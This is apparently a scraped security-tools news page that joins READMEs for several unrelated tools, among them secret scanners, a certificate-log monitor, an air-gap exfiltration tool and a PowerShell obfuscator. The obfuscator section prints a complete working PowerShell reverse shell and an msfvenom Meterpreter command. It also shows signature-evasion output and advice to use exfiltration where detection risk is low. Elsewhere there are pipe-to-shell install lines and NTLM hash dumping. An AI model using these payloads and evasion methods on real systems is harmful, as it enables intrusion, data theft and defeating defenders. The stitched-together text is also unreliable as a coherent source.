By using the most modern static code analysis techniques and providing a native filtering and prioritizing solution on the most important issues, we believe this problem won’t be a concern when using Bearer.

Get in touch

Thanks for using Bearer. Still have questions?

Contributing

Interested in contributing? We're here for it! For details on how to contribute, setting up your development environment, and our processes, review the contribution guide.

Code of conduct

Everyone interacting with this project is expected to follow the guidelines of our code of conduct.

Security

To report a vulnerability or suspected vulnerability, see our security policy. For any questions, concerns or other security matters, feel free to open an issue or join the Discord Community.



Certwatcher - Tool For Capturing And Tracking Certificate Transparency Logs, Using A YAML Template-Based DSL


CertWatcher is a tool for capturing and tracking certificate transparency logs, using YAML templates. The tool helps detect and analyze websites using regular expression patterns and is designed for ease of use by security professionals and researchers.


Certwatcher continuously monitors the certificate data stream and checks for patterns or malicious activity. Certwatcher can also be customized to detect specific phishing, exposed-token, and secret API key patterns using regular expressions defined by YAML templates.

Get Started

Certwatcher allows you to use custom templates to display the certificate information. We have some public custom templates available from the community. You can find them in our repository.

Useful Links

Contribution

If you want to contribute to this project, follow the steps below:

  • Fork this repository.
  • Create a new branch with your feature: git checkout -b my-new-feature
  • Make changes and commit the changes: git commit -m 'Adding a new feature'
  • Push to the original branch: git push origin my-new-feature
  • Open a pull request.

Authors



Noseyparker - A Command-Line Program That Finds Secrets And Sensitive Information In Textual Data And Git History


Nosey Parker is a command-line tool that finds secrets and sensitive information in textual data. It is useful both for offensive and defensive security testing.

Key features:

  • It supports scanning files, directories, and the entire history of Git repositories
  • It uses regular expression matching with a set of 95 patterns chosen for high signal-to-noise based on experience and feedback from offensive security engagements
  • It groups matches together that share the same secret, further emphasizing signal over noise
  • It is fast: it can scan at hundreds of megabytes per second on a single core, and is able to scan 100GB of Linux kernel source history in less than 2 minutes on an older MacBook Pro

This open-source version of Nosey Parker is a reimplementation of the internal version that is regularly used in offensive security engagements at Praetorian. The internal version has additional capabilities for false positive suppression and an alternative machine learning-based detection engine. Read more in blog posts here and here.


Building from source

1. (On x86_64) Install the Hyperscan library and headers for your system

On macOS using Homebrew:

brew install hyperscan pkg-config

On Ubuntu 22.04:

apt install libhyperscan-dev pkg-config

1. (On non-x86_64) Build Vectorscan from source

You will need several dependencies, including cmake, boost, ragel, and pkg-config.

Download and extract the source for the 5.4.8 release of Vectorscan:

wget https://github.com/VectorCamp/vectorscan/archive/refs/tags/vectorscan/5.4.8.tar.gz && tar xfz 5.4.8.tar.gz

Build with cmake:

cd vectorscan-vectorscan-5.4.8 && cmake -B build -DCMAKE_BUILD_TYPE=Release . && cmake --build build

Set the HYPERSCAN_ROOT environment variable so that Nosey Parker builds against your from-source build of Vectorscan:

export HYPERSCAN_ROOT="$PWD/build"

Note: The Nosey Parker Dockerfile builds Vectorscan from source and links against that.

2. Install the Rust toolchain

Recommended approach: install from https://rustup.rs

3. Build using Cargo

cargo build --release

This will produce a binary at target/release/noseyparker.

Docker Usage

A prebuilt Docker image is available for the latest release for x86_64:

docker pull ghcr.io/praetorian-inc/noseyparker:latest

A prebuilt Docker image is available for the most recent commit for x86_64:

docker pull ghcr.io/praetorian-inc/noseyparker:edge

For other architectures (e.g., ARM) you will need to build the Docker image yourself:

docker build -t noseyparker .

Run the Docker image with a mounted volume:

docker run -v "$PWD":/opt/ noseyparker

Note: The Docker image runs noticeably slower than a native binary, particularly on macOS.

Usage quick start

The datastore

Most Nosey Parker commands use a datastore. This is a special directory that Nosey Parker uses to record its findings and maintain its internal state. A datastore will be implicitly created by the scan command if needed. You can also create a datastore explicitly using the datastore init -d PATH command.

Scanning filesystem content for secrets

Nosey Parker has built-in support for scanning files, recursively scanning directories, and scanning the entire history of Git repositories.

For example, if you have a Git clone of CPython locally at cpython.git, you can scan its entire history with the scan command. Nosey Parker will create a new datastore at np.cpython and save its findings there.

$ noseyparker scan --datastore np.cpython cpython.git
Found 28.30 GiB from 18 plain files and 427,712 blobs from 1 Git repos [00:00:04]
Scanning content ████████████████████ 100% 28.30 GiB/28.30 GiB [00:00:53]
Scanned 28.30 GiB from 427,730 blobs in 54 seconds (538.46 MiB/s); 4,904/4,904 new matches

Rule Distinct Groups Total Matches
───────────────────────────────────────────────────────────
PEM-Encoded Private Key 1,076 1,192
Generic Secret 331 478
netrc Credentials 42 3,201
Generic API Key 2 31
md5crypt Hash 1 2

Run the `report` command next to show finding details.

Scanning Git repos by URL, GitHub username, or GitHub organization name

Nosey Parker can also scan Git repos that have not already been cloned to the local filesystem. The --git-url URL, --github-user NAME, and --github-org NAME options to scan allow you to specify repositories of interest.

For example, to scan the Nosey Parker repo itself:

$ noseyparker scan --datastore np.noseyparker --git-url https://github.com/praetorian-inc/noseyparker

For example, to scan accessible repositories belonging to octocat:

$ noseyparker scan --datastore np.noseyparker --github-user octocat

These input specifiers will use an optional GitHub token if available in the NP_GITHUB_TOKEN environment variable. Providing an access token gives a higher API rate limit and may make additional repositories accessible to you.

See noseyparker help scan for more details.

Summarizing findings

Nosey Parker prints out a summary of its findings when it finishes scanning. You can also run this step separately:

$ noseyparker summarize --datastore np.cpython

Rule Distinct Groups Total Matches
───────────────────────────────────────────────────────────
PEM-Encoded Private Key 1,076 1,192
Generic Secret 331 478
netrc Credentials 42 3,201
Generic API Key 2 31
md5crypt Hash 1 2

Additional output formats are supported, including JSON and JSON lines, via the --format=FORMAT option.

Reporting detailed findings

To see details of Nosey Parker's findings, use the report command. This prints out a text-based report designed for human consumption:

(Note: the findings above are synthetic, invalid secrets.) Additional output formats are supported, including JSON and JSON lines, via the --format=FORMAT option.

Enumerating repositories from GitHub

To list URLs for repositories belonging to GitHub users or organizations, use the github repos list command. This command uses the GitHub REST API to enumerate repositories belonging to one or more users or organizations. For example:

$ noseyparker github repos list --user octocat
https://github.com/octocat/Hello-World.git
https://github.com/octocat/Spoon-Knife.git
https://github.com/octocat/boysenberry-repo-1.git
https://github.com/octocat/git-consortium.git
https://github.com/octocat/hello-worId.git
https://github.com/octocat/linguist.git
https://github.com/octocat/octocat.github.io.git
https://github.com/octocat/test-repo1.git

An optional GitHub Personal Access Token can be provided via the NP_GITHUB_TOKEN environment variable. Providing an access token gives a higher API rate limit and may make additional repositories accessible to you.

Additional output formats are supported, including JSON and JSON lines, via the --format=FORMAT option.

See noseyparker help github for more details.

Getting help

Running the noseyparker binary without arguments prints top-level help and exits. You can get abbreviated help for a particular command by running noseyparker COMMAND -h.

Tip: More detailed help is available with the help command or long-form --help option.

Contributing

Contributions are welcome, particularly new regex rules. Developing new regex rules is detailed in a separate document.

If you are considering making significant code changes, please open an issue first to start discussion.

License

Nosey Parker is licensed under the Apache License, Version 2.0.

Any contribution intentionally submitted for inclusion in Nosey Parker by you, as defined in the Apache 2.0 license, shall be licensed as above, without any additional terms or conditions.



QRExfiltrate - Tool That Allows You To Convert Any Binary File Into A QRcode Movie. The Data Can Then Be Reassembled Visually Allowing Exfiltration Of Data In Air Gapped Systems


This tool is a command line utility that allows you to convert any binary file into a QRcode GIF. The data can then be reassembled visually allowing exfiltration of data in air gapped systems. It was designed as a proof of concept to demonstrate weaknesses in DLP software; that is, the assumption that data will leave the system via email, USB sticks or other media.

The tool works by taking a binary file and converting it into a series of QR code images. These images are then combined into a GIF file that can be easily reassembled using any standard QR code reader. This allows data to be exfiltrated without detection from most DLP systems.
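
To make the chunk-and-encode idea concrete, here is a rough Go sketch. It is not QRExfiltrate itself (the tool is a shell script built on qrencode and ffmpeg); it assumes the third-party github.com/skip2/go-qrcode package and a placeholder input file name:

// Sketch: split a file into 64-byte chunks and emit one QR code image
// per chunk; the frames could then be assembled into an animated GIF.
package main

import (
    "fmt"
    "os"

    qrcode "github.com/skip2/go-qrcode" // assumed library, not part of QRExfiltrate
)

func main() {
    data, err := os.ReadFile("input.bin") // placeholder input file
    if err != nil {
        panic(err)
    }

    const chunkSize = 64 // mirrors the tool's 64-bytes-per-frame cap
    for i, frame := 0, 0; i < len(data); i, frame = i+chunkSize, frame+1 {
        end := i + chunkSize
        if end > len(data) {
            end = len(data)
        }
        name := fmt.Sprintf("frame_%04d.png", frame)
        // Encode the chunk as a 256x256 QR code image.
        if err := qrcode.WriteFile(string(data[i:end]), qrcode.Medium, 256, name); err != nil {
            panic(err)
        }
    }
}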


How to Use

To use QRExfiltrate, open a command line and navigate to the directory containing the QRExfiltrate scripts.

Once you have done this, you can run the following command to convert your binary file into a QRcode GIF:

./encode.sh ./draft-taddei-ech4ent-introduction-00.txt output.gif

Demo

encode.sh <inputfile>

Where <inputfile> is the path to the binary file you wish to convert and <outputfile> is the path to the desired output GIF file; if no output is specified, output.gif is used.

Once the command completes, you will have a GIF file containing the data from your binary file.

You can then transfer this GIF file as you wish and reassemble the data using any standard QR code reader.

Prerequisites

QRExfiltrate requires the following prerequisites:

  • qrencode
  • ffmpeg

Limitations

QRExfiltrate is limited by the size of the source data; QR encoding per frame has been capped to 64 bytes to ensure the resulting image has a uniform size and shape. Additionally, the conversion to QR codes results in significant storage overhead; on average, the resulting GIF is 50x larger than the original. Finally, QRExfiltrate is limited by the capabilities of the QR code reader. If the reader is not able to detect the QR codes from the GIF, the data will not be able to be reassembled.

The decoder script has been intentionally omitted

Conclusion

QRExfiltrate is a powerful tool that can be used to bypass DLP systems and exfiltrate data in air gapped networks. However, it is important to note that QRExfiltrate should be used with caution and only in situations where the risk of detection is low.



Invoke-PSObfuscation - An In-Depth Approach To Obfuscating The Individual Components Of A PowerShell Payload Whether You're On Windows Or Kali Linux


Traditional obfuscation techniques tend to add layers to encapsulate standing code, such as base64 or compression. These payloads do continue to have a varied degree of success, but it has become trivial to extract the intended payload, and some launchers get detected often, which essentially introduces chokepoints.

The approach this tool introduces is a methodology where you can target and obfuscate the individual components of a script with randomized variations while achieving the same intended logic, without encapsulating the entire payload within a single layer. Due to the complexity of the obfuscation logic, the resulting payloads will be very difficult to signature and will slip past heuristic engines that are not programmed to emulate the inherited logic.

While this script can obfuscate most payloads successfully on its own, this project will also serve as a standing framework that I will use to produce future functions that utilize it to provide dedicated obfuscated payloads, such as one that only produces reverse shells.

I wrote a blog piece for Offensive Security as a precursor to the techniques this tool introduces. Before venturing further, consider giving it a read first: https://www.offensive-security.com/offsec/powershell-obfuscation/


Dedicated Payloads

As part of my ongoing work with PowerShell obfuscation, I am building out scripts that produce dedicated payloads that utilize this framework. These have helped save me time, and I hope you find them useful as well. You can find them within their own folders at the root of this repository.

  1. Get-ReverseShell
  2. Get-DownloadCradle
  3. Get-Shellcode

Components

Like many other programming languages, PowerShell can be broken down into many different components that make up the executable logic. This allows us to defeat signature-based detections with relative ease by changing how we represent individual components within a payload to form an obscure or unintelligible derivative.

Keep in mind that targeting every component in complex payloads is very intrusive. This tool is built so that you can target the components you want to obfuscate in a controlled manner. I have found that a lot of signatures can be defeated simply by targeting cmdlets, variables and any comments. When using this against complex payloads, such as PrintNightmare, keep in mind that custom function parameters / variables will also be changed. Always be sure to properly test any resulting payloads and ensure you are aware of any modified named parameters.

Component types such as pipes and pipeline variables are introduced here to help make your payload more obscure and harder to decode.

Supported Types

  • Aliases (iex)
  • Cmdlets (New-Object)
  • Comments (# and <# #>)
  • Integers (4444)
  • Methods ($client.GetStream())
  • Namespace Classes (System.Net.Sockets.TCPClient)
  • Pipes (|)
  • Pipeline Variables ($_)
  • Strings ("value" | 'value')
  • Variables ($client)

Generators

Each component has its own dedicated generator that contains a list of possible static or dynamically generated values that are randomly selected during each execution. If there are multiple instances of a component, it will iterate over each of them individually with a generator. This adds a degree of randomness each time you run this tool against a given payload, so each iteration will be different. The only exception to this is variable names.

If an algorithm related to a specific component starts to cause a payload to flag, the current design allows us to easily modify the logic for that generator without compromising the entire script.

$Picker = 1..6 | Get-Random
Switch ($Picker) {
1 { $NewValue = 'Stay' }
2 { $NewValue = 'Off' }
3 { $NewValue = 'Ronins' }
4 { $NewValue = 'Lawn' }
5 { $NewValue = 'And' }
6 { $NewValue = 'Rocks' }
}

Requirements

This framework and the resulting payloads have been tested on the following operating system and PowerShell versions. The resulting reverse shells will not work on PowerShell v2.0.

PS Version OS Tested Invoke-PSObfuscation.ps1 Reverse Shell
7.1.3 Kali 2021.2 Supported Supported
5.1.19041.1023 Windows 10 10.0.19042 Supported Supported
5.1.21996.1 Windows 11 10.0.21996 Supported Supported

Usage Examples

CVE-2021-34527 (PrintNightmare)

┌──(tristram㉿kali)-[~]
└─$ pwsh
PowerShell 7.1.3
Copyright (c) Microsoft Corporation.

https://aka.ms/powershell
Type 'help' to get help.

PS /home/tristram> . ./Invoke-PSObfuscation.ps1
PS /home/tristram> Invoke-PSObfuscation -Path .\CVE-2021-34527.ps1 -Cmdlets -Comments -NamespaceClasses -Variables -OutFile o-printnightmare.ps1

>> Layer 0 Obfuscation
>> https://github.com/gh0x0st

[*] Obfuscating namespace classes
[*] Obfuscating cmdlets
[*] Obfuscating variables
[-] -DriverName is now -QhYm48JbCsqF
[-] -NewUser is now -ybrcKe
[-] -NewPassword is now -ZCA9QHerOCrEX84gMgNwnAth
[-] -DLL is now -dNr
[-] -ModuleName is now -jd
[-] -Module is now -tu3EI0q1XsGrniAUzx9WkV2o
[-] -Type is now -fjTOTLDCGufqEu
[-] -FullName is now -0vEKnCqm
[-] -EnumElements is now -B9aFqfvDbjtOXPxrR
[-] -Bitfield is now -bFUCG7LB9gq50p4e
[-] -StructFields is now -xKryDRQnLdjTC8
[-] -PackingSize is now -0CB3X
[-] -ExplicitLayout is now -YegeaeLpPnB
[*] Removing comments
[*] Writing payload to o-printnightmare.ps1
[*] Done

PS /home/tristram>

PowerShell Reverse Shell

$client = New-Object System.Net.Sockets.TCPClient("127.0.0.1",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
┌──(tristram㉿kali)-[~]
└─$ pwsh
PowerShell 7.1.3
Copyright (c) Microsoft Corporation.

https://aka.ms/powershell
Type 'help' to get help.

PS /home/tristram> . ./Invoke-PSObfuscation.ps1
PS /home/tristram> Invoke-PSObfuscation -Path ./revshell.ps1 -Integers -Cmdlets -Strings -ShowChanges

>> Layer 0 Obfuscation
>> https://github.com/gh0x0st

[*] Obfuscating integers
Generator 2 >> 4444 >> $(0-0+0+0-0-0+0+4444)
Generator 1 >> 65535 >> $((65535))
[*] Obfuscating strings
Generator 2 >> 127.0.0.1 >> $([char](16*49/16)+[char](109*50/109)+[char](0+55-0)+[char](20*46/20)+[char](0+48-0)+[char](0+46-0)+[char](0+48-0)+[char](0+46-0)+[char](51*49/51))
Generator 2 >> PS >> $([char](1*80/1)+[char](86+83-86)+[char](0+32-0))
Generator 1 >> > >> ([string]::join('', ( (62,32) |%{ ( [char][int] $_)})) | % {$_})
[*] Obfuscating cmdlets
Generator 2 >> New-Object >> & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_})
Generator 2 >> New-Object >> & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_})
Generator 1 >> Out-String >> & (("Tpltq1LeZGDhcO4MunzVC5NIP-vfWow6RxXSkbjYAU0aJm3KEgH2sFQr7i8dy9B")[13,16,3,25,35,3,55,57,17,49] -join '')
[*] Writing payload to /home/tristram/obfuscated.ps1
[*] Done

Obfuscated PowerShell Reverse Shell

Meterpreter PowerShell Shellcode

┌──(tristram㉿kali)-[~]
└─$ pwsh
PowerShell 7.1.3
Copyright (c) Microsoft Corporation.

https://aka.ms/powershell
Type 'help' to get help.

PS /home/kali> msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 EXITFUNC=thread -f ps1 -o meterpreter.ps1
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 686 bytes
Final size of ps1 file: 3385 bytes
Saved as: meterpreter.ps1
PS /home/kali> . ./Invoke-PSObfuscation.ps1
PS /home/kali> Invoke-PSObfuscation -Path ./meterpreter.ps1 -Integers -Variables -OutFile o-meterpreter.ps1

>> Layer 0 Obfuscation
>> https://github.com/gh0x0st

[*] Obfuscating integers
[*] Obfuscating variables
[*] Writing payload to o-meterpreter.ps1
[*] Done

Comment-Based Help

<#
.SYNOPSIS
Transforms PowerShell scripts into something obscure, unclear, or unintelligible.

.DESCRIPTION
Where most obfuscation tools tend to add layers to encapsulate standing code, such as base64 or compression,
they tend to leave the intended payload intact, which essentially introduces chokepoints. Invoke-PSObfuscation
focuses on replacing the existing components of your code, or layer 0, with alternative values.

.PARAMETER Path
A user provided PowerShell payload via a flat file.

.PARAMETER All
The all switch is used to engage every supported component to obfuscate a given payload. This action is very intrusive
and could result in your payload being broken. There should be no issues when using this with the vanilla reverse
shell. However, it's recommended to target specific components with more advanced payloads. Keep in mind that some of
the generators introduced in this script may even confuse your ISE so be sure to test properly.

.PARAMETER Aliases
The aliases switch is used to instruct the function to obfuscate aliases.

.PARAMETER Cmdlets
The cmdlets switch is used to instruct the function to obfuscate cmdlets.

.PARAMETER Comments
The comments switch is used to instruct the function to remove all comments.

.PARAMETER Integers
The integers switch is used to instruct the function to obfuscate integers.

.PARAMETER Methods
The methods switch is used to instruct the function to obfuscate method invocations.

.PARAMETER NamespaceClasses
The namespaceclasses switch is used to instruct the function to obfuscate namespace classes.

.PARAMETER Pipes
The pipes switch is used to instruct the function to obfuscate pipes.

.PARAMETER PipelineVariables
The pipeline variables switch is used to instruct the function to obfuscate pipeline variables.

.PARAMETER ShowChanges
The ShowChanges switch is used to instruct the script to display the raw and obfuscated values on the screen.

.PARAMETER Strings
The strings switch is used to instruct the function to obfuscate prompt strings.

.PARAMETER Variables
The variables switch is used to instruct the function to obfuscate variables.

.EXAMPLE
PS C:\> Invoke-PSObfuscation -Path .\revshell.ps1 -All

.EXAMPLE
PS C:\> Invoke-PSObfuscation -Path .\CVE-2021-34527.ps1 -Cmdlets -Comments -NamespaceClasses -Variables -OutFile o-printernightmare.ps1

.OUTPUTS
System.String, System.String

.NOTES
Additional information about the function.
#>


CertWatcher - A Tool For Capturing And Tracking Certificate Transparency Logs, Using A YAML Template-Based DSL


CertWatcher is a tool for capturing and tracking certificate transparency logs, using YAML templates. The tool helps to detect and analyze phishing websites and regular expression patterns, and is designed to be easy to use for security professionals and researchers.



Certwatcher continuously monitors the certificate data stream and checks for suspicious patterns or malicious activity. Certwatcher can also be customized to detect specific phishing patterns and combat the spread of malicious websites.

Get Started

Certwatcher allows you to use custom templates to display the certificate information. We have some public custom templates available from the community. You can find them in our repository.

Useful Links

Contribution

If you want to contribute to this project, follow the steps below:

  • Fork this repository.
  • Create a new branch with your feature: git checkout -b my-new-feature
  • Make changes and commit the changes: git commit -m 'Adding a new feature'
  • Push to the original branch: git push origin my-new-feature
  • Open a pull request.

Authors



DataSurgeon - Quickly Extracts IP's, Email Addresses, Hashes, Files, Credit Cards, Social Security Numbers And More From Text


 DataSurgeon (ds) is a versatile tool designed for incident response, penetration testing, and CTF challenges. It allows for the extraction of various types of sensitive information including emails, phone numbers, hashes, credit cards, URLs, IP addresses, MAC addresses, SRV DNS records and a lot more!

  • Supports Windows, Linux and MacOS
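
To illustrate the kind of pattern matching ds performs under the hood, here is a toy Go sketch of regex-based email extraction; it is illustrative only, not DataSurgeon's actual Rust implementation:

// Toy sketch: regex-based extraction of email addresses from text.
package main

import (
    "fmt"
    "regexp"
)

func main() {
    text := "contact alice@example.com or bob@example.org for access"
    // A deliberately simple email pattern, for demonstration only.
    re := regexp.MustCompile(`[\w.+-]+@[\w-]+\.[\w.]+`)
    for _, match := range re.FindAllString(text, -1) {
        fmt.Println(match)
    }
}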

Extraction Features

  • Emails
  • Files
  • Phone numbers
  • Credit Cards
  • Google API Private Key ID's
  • Social Security Numbers
  • AWS Keys
  • Bitcoin wallets
  • URL's
  • IPv4 Addresses and IPv6 addresses
  • MAC Addresses
  • SRV DNS Records
  • Extract Hashes
    • MD4 & MD5
    • SHA-1, SHA-224, SHA-256, SHA-384, SHA-512
    • SHA-3 224, SHA-3 256, SHA-3 384, SHA-3 512
    • MySQL 323, MySQL 41
    • NTLM
    • bcrypt

Want more?

Please read the contributing guidelines here

Quick Install

Install Rust and Git

Linux

wget -O - https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.sh | bash

Windows

Enter the line below in an elevated PowerShell window.

IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.ps1")

Relaunch your terminal and you will be able to use ds from the command line.

Mac

curl --proto '=https' --tlsv1.2 -sSf https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.sh | sh

Command Line Arguments



Video Guide

Examples

Extracting Files From a Remote Website

Here I use wget to make a request to stackoverflow, then forward the body text to ds. The -F option will list all files found. --clean is used to remove any extra text that might have been returned (such as extra HTML). The result is then sent to uniq, which removes any duplicate files found.

 wget -qO - https://www.stackoverflow.com | ds -F --clean | uniq


Extracting Mac Addresses From an Output File

Here I am pulling all MAC addresses found in autodeauth's log file using the -m query. The --hide option will hide the identifier string in front of the results; in this case, 'mac_address: ' is hidden from the output. The -T option is used to check the same line multiple times for matches. Normally, when a match is found, the tool moves on to the next line rather than checking again.

$ ./ds -m -T --hide -f /var/log/autodeauth/log     
2023-02-26 00:28:19 - Sending 500 deauth frames to network: BC:2E:48:E5:DE:FF -- PrivateNetwork
2023-02-26 00:35:22 - Sending 500 deauth frames to network: 90:58:51:1C:C9:E1 -- TestNet

Reading all files in a directory

The line below will read all files in the current directory recursively. The -D option is used to display the filename (-f is required for the filename to display) and -e is used to search for emails.

$ find . -type f -exec ds -f {} -CDe \;


Speed Tests

When no specific query is provided, ds will search through all possible types of data, which is SIGNIFICANTLY slower than using individual queries. The slowest query is --files. It's also slightly faster to use cat to pipe the data to ds.

Below is the elapsed time when processing a 5GB test file generated by ds-test. Each test was run 3 times and the average time was recorded.

Computer Specs

Processor	Intel(R) Core(TM) i5-10400F CPU @ 2.90GHz, 2904 Mhz, 6 Core(s), 12 Logical Processor(s)
Ram 12.0 GB (11.9 GB usable)

Searching all data types

Command Speed
cat test.txt | ds -t 00h:02m:04s
ds -t -f test.txt 00h:02m:05s
cat test.txt | ds -t -o output.txt 00h:02m:06s

Using specific queries

Command Speed Query Count
cat test.txt | ds -t -6 00h:00m:12s 1
cat test.txt | ds -t -i -m 00h:00m:22s 2
cat test.txt | ds -tF6c 00h:00m:32s 3

Project Goals

  • JSON and CSV output
  • Untar/unzip and a directory-searching mode
  • Base64 Detection and decoding


DC-Sonar - Analyzing AD Domains For Security Risks Related To User Accounts

DC Sonar Community

Repositories

The project consists of repositories:

Disclaimer

It is for educational purposes only.

Avoid using it on the production Active Directory (AD) domain.

No contributor incurs any responsibility for any use of it.

Social media

Check out our Red Team community Telegram channel

Description

Architecture

For the visual descriptions, open the diagram files using the diagrams.net tool.

The app consists of:


Functionality

The DC Sonar Community provides functionality for analyzing AD domains for security risks related to accounts:

  • Register analyzing AD domain in the app

  • See the statuses of domain analyzing processes

  • Dump and brute-force NTLM hashes from registered AD domains to list accounts with weak and vulnerable passwords

  • Analyze AD domain accounts to list ones with never-expiring passwords

  • Analyze AD domain accounts by their NTLM password hashes to determine accounts and domains where passwords repeat

Installation

Docker

In progress ...

Manually using dpkg

It is assumed that you have a clean Ubuntu Server 22.04 and an account with the username "user".

The app will install to /home/user/dc-sonar.

Future releases may have a more flexible installation.

Download dc_sonar_NNNN.N.NN-N_amd64.tar.gz from the latest release to the server.

Create a folder for extracting files:

mkdir dc_sonar_NNNN.N.NN-N_amd64

Extract the downloaded archive:

tar -xvf dc_sonar_NNNN.N.NN-N_amd64.tar.gz -C dc_sonar_NNNN.N.NN-N_amd64

Go to the folder with the extracted files:

cd dc_sonar_NNNN.N.NN-N_amd64/

Install PostgreSQL:

sudo bash install_postgresql.sh

Install RabbitMQ:

sudo bash install_rabbitmq.sh

Install dependencies:

sudo bash install_dependencies.sh

It will ask for confirmation of adding the ppa:deadsnakes/ppa repository. Press Enter.

Install dc-sonar itself:

sudo dpkg -i dc_sonar_NNNN.N.NN-N_amd64.deb

It will ask for information for creating a Django admin user. Provide a username, email and password.

It will ask twice for information for creating a self-signed SSL certificate. Provide the required information.

Open: https://localhost

Enter Django admin user credentials set during the installation process before.

Style guide

See the information in STYLE_GUIDE.md

Deployment for development

Docker

In progress ...

Manually using Windows host and Ubuntu Server guest

In this case, we will set up the environment for editing code on the Windows host while running Python code on the Ubuntu guest.

Set up the virtual machine

Create a virtual machine with 2 CPU, 2048 MB RAM, 10GB SSD using Ubuntu Server 22.04 iso in VirtualBox.

If the Ubuntu installer asks to update itself before the VM's installation, agree.

Choose to install OpenSSH Server.

VirtualBox Port Forwarding Rules:

Name                         Protocol  Host IP    Host Port  Guest IP   Guest Port
SSH                          TCP       127.0.0.1  2222       10.0.2.15  22
RabbitMQ management console  TCP       127.0.0.1  15672      10.0.2.15  15672
Django Server                TCP       127.0.0.1  8000       10.0.2.15  8000
NTLM Scrutinizer             TCP       127.0.0.1  5000       10.0.2.15  5000
PostgreSQL                   TCP       127.0.0.1  25432      10.0.2.15  5432

Config Windows

Download and install Python 3.10.5.

Create a folder for the DC Sonar project.

Go to the project folder using Git for Windows:

cd '{PATH_TO_FOLDER}'

Make Windows installation steps for dc-sonar-user-layer.

Make Windows installation steps for dc-sonar-workers-layer.

Make Windows installation steps for ntlm-scrutinizer.

Make Windows installation steps for dc-sonar-frontend.

Set shared folders

Follow the steps from "Open VirtualBox" to "Reboot VM", but add shared folders to the VM with "Auto-mount" enabled, as in the picture below:

After the reboot, run:

sudo adduser $USER vboxsf

Log out and log back in with the user account.

In the /home/user directory, you can now use the mounted folders:

ls -l
Output:
total 12
drwxrwx--- 1 root vboxsf 4096 Jul 19 13:53 dc-sonar-user-layer
drwxrwx--- 1 root vboxsf 4096 Jul 19 10:11 dc-sonar-workers-layer
drwxrwx--- 1 root vboxsf 4096 Jul 19 14:25 ntlm-scrutinizer

Config Ubuntu Server

Config PostgreSQL

Install PostgreSQL (the paths below assume PostgreSQL 12, the default on Ubuntu 20.04):

sudo apt update
sudo apt install postgresql postgresql-contrib
sudo systemctl start postgresql.service

Create the admin database account:

sudo -u postgres createuser --interactive
Output:
Enter name of role to add: admin
Shall the new role be a superuser? (y/n) y

Create the dc_sonar_workers_layer database account:

sudo -u postgres createuser --interactive
Output:
Enter name of role to add: dc_sonar_workers_layer
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n

Create the dc_sonar_user_layer database account:

sudo -u postgres createuser --interactive
Output:
Enter name of role to add: dc_sonar_user_layer
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n

Create the back_workers_db database:

sudo -u postgres createdb back_workers_db

Create the web_app_db database:

sudo -u postgres createdb web_app_db

Run the psql:

sudo -u postgres psql

Set a password for the admin account:

ALTER USER admin WITH PASSWORD '{YOUR_PASSWORD}';

Set a password for the dc_sonar_workers_layer account:

ALTER USER dc_sonar_workers_layer WITH PASSWORD '{YOUR_PASSWORD}';

Set a password for the dc_sonar_user_layer account:

ALTER USER dc_sonar_user_layer WITH PASSWORD '{YOUR_PASSWORD}';

Grant CRUD permissions for the dc_sonar_workers_layer account on the back_workers_db database:

\c back_workers_db
GRANT CONNECT ON DATABASE back_workers_db to dc_sonar_workers_layer;
GRANT USAGE ON SCHEMA public to dc_sonar_workers_layer;
GRANT ALL ON ALL TABLES IN SCHEMA public TO dc_sonar_workers_layer;
GRANT ALL ON ALL SEQUENCES IN SCHEMA public TO dc_sonar_workers_layer;
GRANT ALL ON ALL FUNCTIONS IN SCHEMA public TO dc_sonar_workers_layer;

Grant CRUD permissions for the dc_sonar_user_layer account on the web_app_db database:

\c web_app_db
GRANT CONNECT ON DATABASE web_app_db to dc_sonar_user_layer;
GRANT USAGE ON SCHEMA public to dc_sonar_user_layer;
GRANT ALL ON ALL TABLES IN SCHEMA public TO dc_sonar_user_layer;
GRANT ALL ON ALL SEQUENCES IN SCHEMA public TO dc_sonar_user_layer;
GRANT ALL ON ALL FUNCTIONS IN SCHEMA public TO dc_sonar_user_layer;

Exit psql:

\q

Open the pg_hba.conf file:

sudo nano /etc/postgresql/12/main/pg_hba.conf

Add the following lines to allow connections from the host machine to PostgreSQL, then save and close the file:

# IPv4 local connections:
host all all 127.0.0.1/32 md5
host all admin 0.0.0.0/0 md5

Open the postgresql.conf file:

sudo nano /etc/postgresql/12/main/postgresql.conf

Change the parameters specified below, then save and close the file:

listen_addresses = 'localhost,10.0.2.15'
shared_buffers = 512MB
work_mem = 5MB
maintenance_work_mem = 100MB
effective_cache_size = 1GB

Restart the PostgreSQL service:

sudo service postgresql restart

Check the PostgreSQL service status:

service postgresql status

Check the log file if needed:

tail -f /var/log/postgresql/postgresql-12-main.log

Now you can connect to the created databases from Windows using the admin account and a client such as DBeaver.
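
If you prefer a quick scripted check over a GUI client, a minimal sketch (assuming the psycopg2-binary package is installed via pip) can connect through the forwarded host port 25432 from the VirtualBox rules above:

import psycopg2

# connect through the VirtualBox port forwarding (host 25432 -> guest 5432)
conn = psycopg2.connect(
    host="127.0.0.1",
    port=25432,
    dbname="web_app_db",
    user="admin",
    password="{YOUR_PASSWORD}",  # the password set for the admin role above
)
with conn.cursor() as cur:
    cur.execute("SELECT version();")
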